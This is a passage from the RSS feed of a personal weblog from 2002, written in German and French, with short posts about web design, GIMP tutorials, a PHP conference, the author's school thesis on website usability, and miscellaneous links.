  13627. ]]></description>
  13628.    <content:encoded><![CDATA[Maintenant vous pouvez changer le layout de mon weblog au réglage<br><br><a href="http://phrenologik.free.fr/"><b>phrenologik</b></a> est une site à tendance "dark"
  13629. ]]></content:encoded>
  13630.  </item>
  13631.  
  13632.  <item>
  13633.    <title>Neues Design</title>
  13634.    <link>https://blog.x-way.org/Webdesign/2002/12/07/Neues_Design.html</link>
  13635.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=220</guid>
  13636.    <dc:creator>Andreas Jaggi</dc:creator>
  13637.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13638.    <pubDate>Sat, 07 Dec 2002 18:52:00 +0000</pubDate>
  13639.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  13640.    <description><![CDATA[Da auch <a href="http://kniebes.com/"><b>mk</b></a> und <a href="https://web.archive.org/web/20021130132122/http://www.sweet-cheeva.de/"><b>chee</b></a> ihrem Weblog ein neues Aussehen geschenkt haben, musste ich die schon länger geplante Erweiterung meines PHP-Irrgartens, den Layout-Switcher, endlich fertig machen. Bei den Einstellungen könnt ihr nun euer Lieblingsdesign auswählen. Vorerst ist zwar nur das Standardlayout plain und das besonders kreative txt verfügbar - später werden's mehr sein ;-)
  13641. ]]></description>
  13642.    <content:encoded><![CDATA[Da auch <a href="http://kniebes.com/"><b>mk</b></a> und <a href="https://web.archive.org/web/20021130132122/http://www.sweet-cheeva.de/"><b>chee</b></a> ihrem Weblog ein neues Aussehen geschenkt haben, musste ich die schon länger geplante Erweiterung meines PHP-Irrgartens, den Layout-Switcher, endlich fertig machen. Bei den Einstellungen könnt ihr nun euer Lieblingsdesign auswählen. Vorerst ist zwar nur das Standardlayout plain und das besonders kreative txt verfügbar - später werden's mehr sein ;-)
  13643. ]]></content:encoded>
  13644.  </item>
  13645.  
  13646.  <item>
  13647.    <title>Dekonstruktohastenichgesehn</title>
  13648.    <link>https://blog.x-way.org/Misc/2002/12/06/Dekonstruktohastenichgesehn.html</link>
  13649.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=219</guid>
  13650.    <dc:creator>Andreas Jaggi</dc:creator>
  13651.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13652.    <pubDate>Fri, 06 Dec 2002 18:18:00 +0000</pubDate>
  13653.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13654.    <description><![CDATA[Kann mir das jemand erklären?<br>von papadelis@t-online.de (wer ist das?) erhalten<br><br>Dekonstruktion (dt.) dient als Schlagwort für eine ganze Reihe von Strömungen in
  13655. Philosophie, Architektur, Kunst und Literatur seit den sechziger Jahren.
  13656. Deconstruction (am.) soll hier im engeren Sinne als Kennzeichen für ein Lektüre-
  13657. und Analyseverfahren von Texten stehen, das sich von hermeneutischen Theorien
  13658. [Querverweis Hermeneutik] und der Praxis der Interpretation abgrenzt.
  13659. Der Unterschied zwischen hermeneutischen und dekonstruktiven
  13660. (antihermeneutischen) Textbefragungen besteht darin, daß der hermeneutische
  13661. Ansatz von einem quasi dialogischen Verhältnis zwischen Text und Interpret
  13662. ausgehen, das auf ein zunehmend besseres Verständnis der im Text enthaltenen
  13663. Botschaft abzielt. Dadurch wird letztlich eine rekonstruierbare Sinneinheit
  13664. unterstellt wird. Dekonstruktivisten bemühen sich um das Gegenteil: sie bemühen
  13665. sich um den Nachweis, daß - und vor allem: wie - ein Text seine Bedeutung selbst
  13666. hinterfragt, durchkreuzt und gerade mit solchen Paradoxien Sinn schafft.
  13667. Dieses Nachspüren von im Text angelegten Widersprüchen wurde - unter Einfluß des
  13668. französischen Philosophen Jacques Derrida - zunächst in Nordamerika praktiziert:
  13669. Literaturwissenschaftler wie Paul de Man, J. Hillis Miller und Geoffrey Hartman
  13670. zeigen in ihren Analysen, wie die Bedeutungsebene (Textsemantik, die
  13671. Signifikate) und die materiale Ebene (die rhetorische Figuralität, die
  13672. Signifikanten gegeneinander arbeiten, indem auch über die materiale Form der
  13673. Zeichen Bedeutung transportiert wird. "Jegliche Sprache ist, wie de Man richtig
  13674. bemerkt, unausweichlich metaphorisch, arbeitet mit Tropen und Bildern, es ist
  13675. ein Fehler zu glauben, daß irgendeine Sprache buchstäblich wörtlich ist."
  13676. (Eagleton, S. 131) In literarischen Texten jedoch tritt die Unentscheidbarkeit
  13677. zwischen 'wortwörtlichen'und figuralen Lesarten deutlicher hervor als in
  13678. anderen.<br>
  13679. Als Wortneuschöpfung vereint der Begriff Dekonstruktion sowohl Sinnkonstruktion
  13680. als auch Sinndestruktion. Auch eine dekonstruktive Lektüre kann nicht auf eine
  13681. vorhergehende hermeneutische Interpretation verzichten. Üblicherweise wird dafür
  13682. zunächst eine semantische bzw. referentielle Lesart vorgeschlagen, deren
  13683. Vereinfachungstendenz in einer zweiten, die rhetorische Ebene des Textes
  13684. betonenden Lesart aufgezeigt wird.<br>
  13685. Daraus ergeben sich verschiedene literaturtheoretische Einsichten: Literatur ist
  13686. der Ort, an dem sich die Utopie der sprachlichen Referenz auf eine der Sprache
  13687. präexistierenden Wirklichkeit zugleich mit der Einsicht in ihre Unmöglichkeit
  13688. zeigt: "Von der Antike bis zu den Versuchen der Avantgarde ist die Literatur
  13689. bemüht, etwas darzustellen. Was? Ich sage ganz hart: das Wirkliche. Das
  13690. Wirkliche ist nicht darstellbar [...] Mit dem Umstand, daß es keine
  13691. Übereinstimmung zwischen dem Wirklichen und der Rede gibt, können die Menschen
  13692. sich nicht abfinden, und diese Weigerung, die vielleicht so alt ist wie die Rede
  13693. selbst, bringt in einem unablässigen Bemühen Literatur hervor. Man könnte sich
  13694. eine Geschichte der Literatur vorstellen [...], die die Geschichte der - oft
  13695. ganz aberwitzigen - verbalen Notbehelfe wäre, die die Menschen benutzt haben, um
  13696. das zu reduzieren, zu zähmen, zu leugnen oder auch das auf sich zu nehmen, was
  13697. immer ein Delirium ist, nämlich die fundamentale Nicht-Adäquatheit von Rede und
  13698. Wirklichem." (S. 32ff.)<br>
  13699. Weiterhin scheint es typisch für dekonstruktive Lesarten zu sein, binäre
  13700. Oppositionen wie Buchstäblichkeit / Bildhaftigkeit, Wissenschaft / Literatur,
  13701. Objektsprache / Metasprache, innen / außen, männlich / weiblich, Geist / Körper,
  13702. Kultur / Natur, Subjekt / Objekt, Signifikat / Signifikant etc. außer Kraft zu
  13703. setzen, weil sie nachweisen, daß bestimmte Regelmäßigkeiten, die einen der
  13704. beiden Begriffe und damit die unterscheidende Grenze zum anderen Begriff
  13705. kennzeichnen, gleichermaßen für den anderen gelten. Darin enthalten ist eine
  13706. fundamentale Ideologie- und Kulturkritik, weil solche binären Oppositionen das
  13707. Denken und die Wahrnehmung nicht nur als Vorstellung einer unüberbrückbaren
  13708. Differenz zwischen den beiden Einheiten prägen, sondern weil zumeist einer der
  13709. beiden Begriffe eine höhere Geltung erlangt als der andere. Dekonstruktion
  13710. erklärt diese Opposition nicht nur für ungültig: Gezeigt wird auch, daß in - oft
  13711. kanonischen - Texten Widerstände gegen diese Vereinheitlichung des Sinns
  13712. eingeschrieben sind. Dekonstruktive Lektüren sind daher mittlerweile
  13713. selbstverständlicher Bestandteil in den verschiedensten literatur- und
  13714. kulturwissenschaftlichen Disziplinen geworden (v.a. Postkolonialismus,
  13715. Feministische Literaturtheorie, Psychoanalytische Literaturwissenschaft.
  13716. ]]></description>
  13717.    <content:encoded><![CDATA[Kann mir das jemand erklären?<br>von papadelis@t-online.de (wer ist das?) erhalten<br><br>Dekonstruktion (dt.) dient als Schlagwort für eine ganze Reihe von Strömungen in
  13718. Philosophie, Architektur, Kunst und Literatur seit den sechziger Jahren.
  13719. Deconstruction (am.) soll hier im engeren Sinne als Kennzeichen für ein Lektüre-
  13720. und Analyseverfahren von Texten stehen, das sich von hermeneutischen Theorien
  13721. [Querverweis Hermeneutik] und der Praxis der Interpretation abgrenzt.
  13722. Der Unterschied zwischen hermeneutischen und dekonstruktiven
  13723. (antihermeneutischen) Textbefragungen besteht darin, daß der hermeneutische
  13724. Ansatz von einem quasi dialogischen Verhältnis zwischen Text und Interpret
  13725. ausgehen, das auf ein zunehmend besseres Verständnis der im Text enthaltenen
  13726. Botschaft abzielt. Dadurch wird letztlich eine rekonstruierbare Sinneinheit
  13727. unterstellt wird. Dekonstruktivisten bemühen sich um das Gegenteil: sie bemühen
  13728. sich um den Nachweis, daß - und vor allem: wie - ein Text seine Bedeutung selbst
  13729. hinterfragt, durchkreuzt und gerade mit solchen Paradoxien Sinn schafft.
  13730. Dieses Nachspüren von im Text angelegten Widersprüchen wurde - unter Einfluß des
  13731. französischen Philosophen Jacques Derrida - zunächst in Nordamerika praktiziert:
  13732. Literaturwissenschaftler wie Paul de Man, J. Hillis Miller und Geoffrey Hartman
  13733. zeigen in ihren Analysen, wie die Bedeutungsebene (Textsemantik, die
  13734. Signifikate) und die materiale Ebene (die rhetorische Figuralität, die
  13735. Signifikanten gegeneinander arbeiten, indem auch über die materiale Form der
  13736. Zeichen Bedeutung transportiert wird. "Jegliche Sprache ist, wie de Man richtig
  13737. bemerkt, unausweichlich metaphorisch, arbeitet mit Tropen und Bildern, es ist
  13738. ein Fehler zu glauben, daß irgendeine Sprache buchstäblich wörtlich ist."
  13739. (Eagleton, S. 131) In literarischen Texten jedoch tritt die Unentscheidbarkeit
  13740. zwischen 'wortwörtlichen'und figuralen Lesarten deutlicher hervor als in
  13741. anderen.<br>
  13742. Als Wortneuschöpfung vereint der Begriff Dekonstruktion sowohl Sinnkonstruktion
  13743. als auch Sinndestruktion. Auch eine dekonstruktive Lektüre kann nicht auf eine
  13744. vorhergehende hermeneutische Interpretation verzichten. Üblicherweise wird dafür
  13745. zunächst eine semantische bzw. referentielle Lesart vorgeschlagen, deren
  13746. Vereinfachungstendenz in einer zweiten, die rhetorische Ebene des Textes
  13747. betonenden Lesart aufgezeigt wird.<br>
  13748. Daraus ergeben sich verschiedene literaturtheoretische Einsichten: Literatur ist
  13749. der Ort, an dem sich die Utopie der sprachlichen Referenz auf eine der Sprache
  13750. präexistierenden Wirklichkeit zugleich mit der Einsicht in ihre Unmöglichkeit
  13751. zeigt: "Von der Antike bis zu den Versuchen der Avantgarde ist die Literatur
  13752. bemüht, etwas darzustellen. Was? Ich sage ganz hart: das Wirkliche. Das
  13753. Wirkliche ist nicht darstellbar [...] Mit dem Umstand, daß es keine
  13754. Übereinstimmung zwischen dem Wirklichen und der Rede gibt, können die Menschen
  13755. sich nicht abfinden, und diese Weigerung, die vielleicht so alt ist wie die Rede
  13756. selbst, bringt in einem unablässigen Bemühen Literatur hervor. Man könnte sich
  13757. eine Geschichte der Literatur vorstellen [...], die die Geschichte der - oft
  13758. ganz aberwitzigen - verbalen Notbehelfe wäre, die die Menschen benutzt haben, um
  13759. das zu reduzieren, zu zähmen, zu leugnen oder auch das auf sich zu nehmen, was
  13760. immer ein Delirium ist, nämlich die fundamentale Nicht-Adäquatheit von Rede und
  13761. Wirklichem." (S. 32ff.)<br>
  13762. Weiterhin scheint es typisch für dekonstruktive Lesarten zu sein, binäre
  13763. Oppositionen wie Buchstäblichkeit / Bildhaftigkeit, Wissenschaft / Literatur,
  13764. Objektsprache / Metasprache, innen / außen, männlich / weiblich, Geist / Körper,
  13765. Kultur / Natur, Subjekt / Objekt, Signifikat / Signifikant etc. außer Kraft zu
  13766. setzen, weil sie nachweisen, daß bestimmte Regelmäßigkeiten, die einen der
  13767. beiden Begriffe und damit die unterscheidende Grenze zum anderen Begriff
  13768. kennzeichnen, gleichermaßen für den anderen gelten. Darin enthalten ist eine
  13769. fundamentale Ideologie- und Kulturkritik, weil solche binären Oppositionen das
  13770. Denken und die Wahrnehmung nicht nur als Vorstellung einer unüberbrückbaren
  13771. Differenz zwischen den beiden Einheiten prägen, sondern weil zumeist einer der
  13772. beiden Begriffe eine höhere Geltung erlangt als der andere. Dekonstruktion
  13773. erklärt diese Opposition nicht nur für ungültig: Gezeigt wird auch, daß in - oft
  13774. kanonischen - Texten Widerstände gegen diese Vereinheitlichung des Sinns
  13775. eingeschrieben sind. Dekonstruktive Lektüren sind daher mittlerweile
  13776. selbstverständlicher Bestandteil in den verschiedensten literatur- und
  13777. kulturwissenschaftlichen Disziplinen geworden (v.a. Postkolonialismus,
  13778. Feministische Literaturtheorie, Psychoanalytische Literaturwissenschaft.
  13779. ]]></content:encoded>
  13780.  </item>
  13781.  
  13782.  <item>
  13783.    <title>GIMP-Tutorials</title>
  13784.    <link>https://blog.x-way.org/Webdesign/2002/12/05/GIMP-Tutorials.html</link>
  13785.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=218</guid>
  13786.    <dc:creator>Andreas Jaggi</dc:creator>
  13787.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13788.    <pubDate>Thu, 05 Dec 2002 13:25:00 +0000</pubDate>
  13789.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  13790.    <description><![CDATA[Verschiedene deutsche Tutorials zu <a href="http://gimp.org/"><b>GIMP</b></a>:<br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/04/bildbearbeitung-mit-gimp-teil-1/"><b>Gimp verstehen</b></a><br>-  <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/05/bildbearbeitung-mit-gimp-teil-2/"><b>Nachbearbeitet </b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/06/bildbearbeitung-mit-gimp-teil-3/"><b>Scheibchenweise</b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/07/bildbearbeitung-mit-gimp-teil-4/"><b>Angestöpselt</b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/08/bildbearbeitung-mit-gimp-teil-5/"><b>Gimpressionen</b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/09/bildbearbeitung-mit-gimp-teil-6/"><b>Bilder fürs Web</b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/10/bildbearbeitung-mit-gimp-teil-7/"><b>Farbverläufe und Pfade</b></a><br>- <a href="http://www.home.unix-ag.org/simon/gimp/lt2k/talk/"><b>Bildbearbeitung mit Gimp 1.2</b></a><br>- <a href="https://web.archive.org/web/20021208055803/http://www.gimp.de/Grokking_the_Gimp/"><b>Grokking the Gimp</b></a><br>- <a href="https://web.archive.org/web/20030323035440/https://www.mitp.de/imperia/md/content/vmi/0615/0615_Kap03-1.pdf"><b>Gimp in 80 Minuten</b></a><br>- <a href="https://web.archive.org/web/20021208113623/http://www.gm4t9.de/gimp/"><b>die Gimp-Seiten</b></a><br>- <a href="#" class="gone"><b>Fotoretusche mit Gimp</b></a><br>- <a href="https://web.archive.org/web/20021203053702/http://home.t-online.de/home/creativepartners/Gimp/gimp.html"><b>GIMP for Windows</b></a><br>- <a href="https://web.archive.org/web/20030115144135/http://www.lemitec.de/gimp/"><b>Lehrfilme</b></a><br><br>abgestaubt bei <a href="https://web.archive.org/web/20150122234347/http://blog.rompe.org/"><b>rompe</b></a> und <a href="http://kniebes.com/"><b>mk</b></a>
  13791. ]]></description>
  13792.    <content:encoded><![CDATA[Verschiedene deutsche Tutorials zu <a href="http://gimp.org/"><b>GIMP</b></a>:<br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/04/bildbearbeitung-mit-gimp-teil-1/"><b>Gimp verstehen</b></a><br>-  <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/05/bildbearbeitung-mit-gimp-teil-2/"><b>Nachbearbeitet </b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/06/bildbearbeitung-mit-gimp-teil-3/"><b>Scheibchenweise</b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/07/bildbearbeitung-mit-gimp-teil-4/"><b>Angestöpselt</b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/08/bildbearbeitung-mit-gimp-teil-5/"><b>Gimpressionen</b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/09/bildbearbeitung-mit-gimp-teil-6/"><b>Bilder fürs Web</b></a><br>- <a href="https://www.linux-community.de/ausgaben/linuxuser/2001/10/bildbearbeitung-mit-gimp-teil-7/"><b>Farbverläufe und Pfade</b></a><br>- <a href="http://www.home.unix-ag.org/simon/gimp/lt2k/talk/"><b>Bildbearbeitung mit Gimp 1.2</b></a><br>- <a href="https://web.archive.org/web/20021208055803/http://www.gimp.de/Grokking_the_Gimp/"><b>Grokking the Gimp</b></a><br>- <a href="https://web.archive.org/web/20030323035440/https://www.mitp.de/imperia/md/content/vmi/0615/0615_Kap03-1.pdf"><b>Gimp in 80 Minuten</b></a><br>- <a href="https://web.archive.org/web/20021208113623/http://www.gm4t9.de/gimp/"><b>die Gimp-Seiten</b></a><br>- <a href="#" class="gone"><b>Fotoretusche mit Gimp</b></a><br>- <a href="https://web.archive.org/web/20021203053702/http://home.t-online.de/home/creativepartners/Gimp/gimp.html"><b>GIMP for Windows</b></a><br>- <a href="https://web.archive.org/web/20030115144135/http://www.lemitec.de/gimp/"><b>Lehrfilme</b></a><br><br>abgestaubt bei <a href="https://web.archive.org/web/20150122234347/http://blog.rompe.org/"><b>rompe</b></a> und <a href="http://kniebes.com/"><b>mk</b></a>
  13793. ]]></content:encoded>
  13794.  </item>
  13795.  
  13796.  <item>
  13797.    <title>Forum du PHP 2002 - Paris</title>
  13798.    <link>https://blog.x-way.org/Coding/2002/12/03/Forum_du_PHP_2002_-_Paris.html</link>
  13799.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=217</guid>
  13800.    <dc:creator>Andreas Jaggi</dc:creator>
  13801.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13802.    <pubDate>Tue, 03 Dec 2002 01:28:00 +0000</pubDate>
  13803.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  13804.    <description><![CDATA[<br><a href="http://www.afup.org"><img src="https://blog.x-way.org/images/afup-logo.gif" alt="AFUP : Association Française des Utilisateurs de PHP"></a><br><br>L'AFUP propose de participier au <a href="https://web.archive.org/web/20030201232322/http://www.afup.org/article.php3?id_article=136"><b>Forum de PHP 2002</b></a> à Paris les 9 et 10 décembre 2002.
  13805. ]]></description>
  13806.    <content:encoded><![CDATA[<br><a href="http://www.afup.org"><img src="https://blog.x-way.org/images/afup-logo.gif" alt="AFUP : Association Française des Utilisateurs de PHP"></a><br><br>L'AFUP propose de participier au <a href="https://web.archive.org/web/20030201232322/http://www.afup.org/article.php3?id_article=136"><b>Forum de PHP 2002</b></a> à Paris les 9 et 10 décembre 2002.
  13807. ]]></content:encoded>
  13808.  </item>
  13809.  
  13810.  <item>
  13811.    <title>CSS-Technik.de</title>
  13812.    <link>https://blog.x-way.org/Webdesign/2002/12/03/CSS-Technikde.html</link>
  13813.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=216</guid>
  13814.    <dc:creator>Andreas Jaggi</dc:creator>
  13815.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13816.    <pubDate>Tue, 03 Dec 2002 01:17:00 +0000</pubDate>
  13817.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  13818.    <description><![CDATA[<i><a href="http://css-technik.de/"><b>CSS-Technik</b></a> ist ein moderiertes Online-Projekt zur Sammlung von Ressourcen, Scripte und Tutorials zum Thema CSS und PHP für Webgestalter und Internetworker.</i><br>via <a href="http://www.i-worker.de/"><b>[i-worker]</b></a>
  13819. ]]></description>
  13820.    <content:encoded><![CDATA[<i><a href="http://css-technik.de/"><b>CSS-Technik</b></a> ist ein moderiertes Online-Projekt zur Sammlung von Ressourcen, Scripte und Tutorials zum Thema CSS und PHP für Webgestalter und Internetworker.</i><br>via <a href="http://www.i-worker.de/"><b>[i-worker]</b></a>
  13821. ]]></content:encoded>
  13822.  </item>
  13823.  
  13824.  <item>
  13825.    <title>Es weihnachtet ...</title>
  13826.    <link>https://blog.x-way.org/Misc/2002/12/02/Es_weihnachtet_.html</link>
  13827.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=210</guid>
  13828.    <dc:creator>Andreas Jaggi</dc:creator>
  13829.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13830.    <pubDate>Mon, 02 Dec 2002 20:44:00 +0000</pubDate>
  13831.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13832.    <description><![CDATA[<a href="http://www.elfengleich.de/"><b>Sannie</b></a> hat einige amüsante <a href="https://web.archive.org/web/20030506104625/http://www.elfengleich.de/index.php?log_id=332"><b>Weihnachtsgeschichten</b></a> ;-)
  13833. ]]></description>
  13834.    <content:encoded><![CDATA[<a href="http://www.elfengleich.de/"><b>Sannie</b></a> hat einige amüsante <a href="https://web.archive.org/web/20030506104625/http://www.elfengleich.de/index.php?log_id=332"><b>Weihnachtsgeschichten</b></a> ;-)
  13835. ]]></content:encoded>
  13836.  </item>
  13837.  
  13838.  <item>
  13839.    <title>100 % francophone</title>
  13840.    <link>https://blog.x-way.org/Linux/2002/12/02/100__francophone.html</link>
  13841.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=209</guid>
  13842.    <dc:creator>Andreas Jaggi</dc:creator>
  13843.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13844.    <pubDate>Mon, 02 Dec 2002 01:10:00 +0000</pubDate>
  13845.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13846.    <description><![CDATA[On trouve sur <a href="http://www.jesuislibre.org/"><b>jesuislibre.org</b></a> des logiciels libres et 100% francophones ;-)
  13847. ]]></description>
  13848.    <content:encoded><![CDATA[On trouve sur <a href="http://www.jesuislibre.org/"><b>jesuislibre.org</b></a> des logiciels libres et 100% francophones ;-)
  13849. ]]></content:encoded>
  13850.  </item>
  13851.  
  13852.  <item>
  13853.    <title>Winterswap</title>
  13854.    <link>https://blog.x-way.org/Misc/2002/12/02/Winterswap1.html</link>
  13855.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=208</guid>
  13856.    <dc:creator>Andreas Jaggi</dc:creator>
  13857.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13858.    <pubDate>Mon, 02 Dec 2002 00:12:00 +0000</pubDate>
  13859.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13860.    <description><![CDATA[So, die Tracklist für den <a href="http://fischergrube.de/swap/"><b>Winterswap</b></a> steht und die Discs sind gebraten ;-)
  13861. ]]></description>
  13862.    <content:encoded><![CDATA[So, die Tracklist für den <a href="http://fischergrube.de/swap/"><b>Winterswap</b></a> steht und die Discs sind gebraten ;-)
  13863. ]]></content:encoded>
  13864.  </item>
  13865.  
  13866.  <item>
  13867.    <title>World AIDS Day</title>
  13868.    <link>https://blog.x-way.org/Misc/2002/12/01/World_AIDS_Day.html</link>
  13869.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=206</guid>
  13870.    <dc:creator>Andreas Jaggi</dc:creator>
  13871.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13872.    <pubDate>Sun, 01 Dec 2002 00:00:00 +0000</pubDate>
  13873.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13874.    <description><![CDATA[<a href="http://www.worldaidsday.org/"><img src="https://blog.x-way.org/images/lataids.gif" width="199" height="202" alt="World AIDS Day"></a>
  13875. ]]></description>
  13876.    <content:encoded><![CDATA[<a href="http://www.worldaidsday.org/"><img src="https://blog.x-way.org/images/lataids.gif" width="199" height="202" alt="World AIDS Day"></a>
  13877. ]]></content:encoded>
  13878.  </item>
  13879.  
  13880.  <item>
  13881.    <title>Maturaarbeitpräsentation</title>
  13882.    <link>https://blog.x-way.org/School/2002/11/29/Maturaarbeitpraesentation.html</link>
  13883.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=205</guid>
  13884.    <dc:creator>Andreas Jaggi</dc:creator>
  13885.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13886.    <pubDate>Fri, 29 Nov 2002 17:45:00 +0000</pubDate>
  13887.    <category domain="https://blog.x-way.org/School">School</category>
  13888.    <description><![CDATA[So, Präsentation ist fertig vorbereitet. Nun geht's ab ins <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch"><b>Gymnasium</b></a>, auf dass um 20 Uhr alles klappt :-)
  13889. ]]></description>
  13890.    <content:encoded><![CDATA[So, Präsentation ist fertig vorbereitet. Nun geht's ab ins <a href="https://web.archive.org/web/20030209031229/www.gymhmsschadau.ch"><b>Gymnasium</b></a>, auf dass um 20 Uhr alles klappt :-)
  13891. ]]></content:encoded>
  13892.  </item>
  13893.  
  13894.  <item>
  13895.    <title>Mozilla 1.2 Released</title>
  13896.    <link>https://blog.x-way.org/Misc/2002/11/27/Mozilla_12_Released.html</link>
  13897.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=204</guid>
  13898.    <dc:creator>Andreas Jaggi</dc:creator>
  13899.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13900.    <pubDate>Wed, 27 Nov 2002 17:24:00 +0000</pubDate>
  13901.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13902.    <description><![CDATA[<a href="http://mozilla.org/"><b>Mozilla</b></a> 1.2 stable est là! <a href="http://mozilla.org/"><b>Ici</b></a> télécharger!
  13903. ]]></description>
  13904.    <content:encoded><![CDATA[<a href="http://mozilla.org/"><b>Mozilla</b></a> 1.2 stable est là! <a href="http://mozilla.org/"><b>Ici</b></a> télécharger!
  13905. ]]></content:encoded>
  13906.  </item>
  13907.  
  13908.  <item>
  13909.    <title>Maturaarbeit</title>
  13910.    <link>https://blog.x-way.org/School/2002/11/27/Maturaarbeit1.html</link>
  13911.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=203</guid>
  13912.    <dc:creator>Andreas Jaggi</dc:creator>
  13913.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13914.    <pubDate>Wed, 27 Nov 2002 01:46:00 +0000</pubDate>
  13915.    <category domain="https://blog.x-way.org/School">School</category>
  13916.    <description><![CDATA[<a href="https://blog.x-way.org/stuff/Usability%20-%20Benutzerfreundlichkeit%20von%20Websites.pdf"><b>Hier</b></a> gibt's meine Maturaarbeit (Usability - Benutzerfreundlichkeit von Websites) als PDF zum Download.<br>Es ist nur eine Light-Version fürs Web. Wer die 500 MB Print-Version will, bitte melden ;-)<br><br>Logischerweise bin ich mit dem Vorbereiten der Präsentation noch nirgends ;-)
  13917. ]]></description>
  13918.    <content:encoded><![CDATA[<a href="https://blog.x-way.org/stuff/Usability%20-%20Benutzerfreundlichkeit%20von%20Websites.pdf"><b>Hier</b></a> gibt's meine Maturaarbeit (Usability - Benutzerfreundlichkeit von Websites) als PDF zum Download.<br>Es ist nur eine Light-Version fürs Web. Wer die 500 MB Print-Version will, bitte melden ;-)<br><br>Logischerweise bin ich mit dem Vorbereiten der Präsentation noch nirgends ;-)
  13919. ]]></content:encoded>
  13920.  </item>
  13921.  
  13922.  <item>
  13923.    <title>Unterhaltung</title>
  13924.    <link>https://blog.x-way.org/Misc/2002/11/26/Unterhaltung.html</link>
  13925.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=202</guid>
  13926.    <dc:creator>Andreas Jaggi</dc:creator>
  13927.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13928.    <pubDate>Tue, 26 Nov 2002 13:59:00 +0000</pubDate>
  13929.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13930.    <description><![CDATA[<a href="https://web.archive.org/web/20021209101959/http://derulmer.holyhead.de/forum?read=372"><b>Voll Krass bei die Ring</b></a> - Der Herr der Ringe, kommentiert ;-)<br>abgestaubt bei <a href="http://kniebes.com/"><b>mk</b></a>
  13931. ]]></description>
  13932.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20021209101959/http://derulmer.holyhead.de/forum?read=372"><b>Voll Krass bei die Ring</b></a> - Der Herr der Ringe, kommentiert ;-)<br>abgestaubt bei <a href="http://kniebes.com/"><b>mk</b></a>
  13933. ]]></content:encoded>
  13934.  </item>
  13935.  
  13936.  <item>
  13937.    <title>:.</title>
  13938.    <link>https://blog.x-way.org/Tech/2002/11/25/.html</link>
  13939.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=201</guid>
  13940.    <dc:creator>Andreas Jaggi</dc:creator>
  13941.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13942.    <pubDate>Mon, 25 Nov 2002 23:33:00 +0000</pubDate>
  13943.    <category domain="https://blog.x-way.org/Tech">Tech</category>
  13944.    <description><![CDATA[Meine <a href="https://blog.x-way.org/images/mx500.jpg"><b>Maus</b></a>, meine <a href="https://blog.x-way.org/images/tastatur.jpg"><b>Tastatur</b></a> und mein <a href="https://blog.x-way.org/images/gehause.jpg"><b>Gehäuse</b></a>. Schön bunt, nicht? ;-)
  13945. ]]></description>
  13946.    <content:encoded><![CDATA[Meine <a href="https://blog.x-way.org/images/mx500.jpg"><b>Maus</b></a>, meine <a href="https://blog.x-way.org/images/tastatur.jpg"><b>Tastatur</b></a> und mein <a href="https://blog.x-way.org/images/gehause.jpg"><b>Gehäuse</b></a>. Schön bunt, nicht? ;-)
  13947. ]]></content:encoded>
  13948.  </item>
  13949.  
  13950.  <item>
